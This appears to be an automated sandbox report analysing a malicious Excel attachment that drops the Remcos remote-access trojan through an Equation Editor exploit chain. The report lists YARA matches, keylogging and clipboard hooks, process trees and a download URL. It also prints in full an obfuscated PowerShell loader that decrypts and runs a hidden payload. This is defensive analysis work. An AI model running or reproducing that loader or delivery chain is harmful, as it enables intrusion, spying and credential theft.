            Source: 90530000.0.dr, ~DF86012724870D7705.TMP.0.drString found in binary or memory: http://tny.wtf/sAyX
            Source: powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000012_2_0040A2B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,12_2_0040B70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004168C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_0040A3E0

            E-Banking Fraud

            Source: Yara matchFile source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3384, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED

            System Summary

            Source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: RegAsm.exe PID: 3384, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09A9DB5.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: AWD 490104998518.xlsOLE: Microsoft Excel 2007+
            Source: ~DFE4D87C1F83611F19.TMP.0.drOLE: Microsoft Excel 2007+
            Source: 90530000.0.drOLE: Microsoft Excel 2007+
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sA.url
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\tny.wtf.url
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3116
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004167B4
            Source: AWD 490104998518.xlsOLE indicator, VBA macros: true
            Source: AWD 490104998518.xlsStream path 'MBD001EFDDA/\x1Ole' : http://tny.wtf/sAk1bKFw`:5_WX-{LWFumIifr5j(]NK=g Vye4P@+ u5al(:'w$+VkiP*g%A9b9W"&<rIhwQJ.4A/U4m@Jxp8H4yEFYvgQrWjzm9SQ0JwTkQUC5NsDLgFOFBjRcSfxsZHaTXFjIOic4UdLEthgybjfkc2fUqeHOgC8TptH2Fz5aMrdF6iBYFzcb11flCYx8woBIAH36S1N8G7uMAOQbBIvcfQpWqFzxjro1cxJTuQlwK59zsY4i3eRj8m4MoKHf0LnK5MU5uB4zgIHPCI3Q2p90V]}-[\),:8F
            Source: ~DFE4D87C1F83611F19.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: ~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E10 appears 54 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434770 appears 41 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
            Source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: RegAsm.exe PID: 3384, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09A9DB5.doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLS@9/31@8/6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00417952
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040F474
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041B4A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_0041AA4A
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\90530000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-999Z97
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR87D4.tmp
            Source: AWD 490104998518.xls OLE indicator, Workbook stream: true
            Source: 90530000.0.dr OLE indicator, Workbook stream: true
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS"
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: AWD 490104998518.xls ReversingLabs: Detection: 28%
            Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
